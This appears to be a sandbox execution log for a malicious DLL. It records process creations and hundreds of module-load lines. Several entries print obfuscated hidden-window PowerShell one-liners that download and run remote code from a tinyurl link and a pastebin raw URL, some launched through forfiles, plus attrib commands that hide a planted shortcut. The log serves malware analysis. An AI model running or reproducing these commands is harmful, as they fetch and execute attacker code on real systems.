Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5UIy3bo46y.dll
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\5UIy3bo46y.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5UIy3bo46y.dll",#1
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\loaddll64.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll64.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
